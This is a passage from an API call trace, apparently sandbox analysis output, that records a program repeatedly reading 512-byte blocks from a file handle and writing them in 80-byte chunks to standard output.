lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.974] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.975] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.975] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.976] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.976] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.977] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.977] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.978] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.978] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.979] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.979] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.981] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.981] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.982] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.982] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, 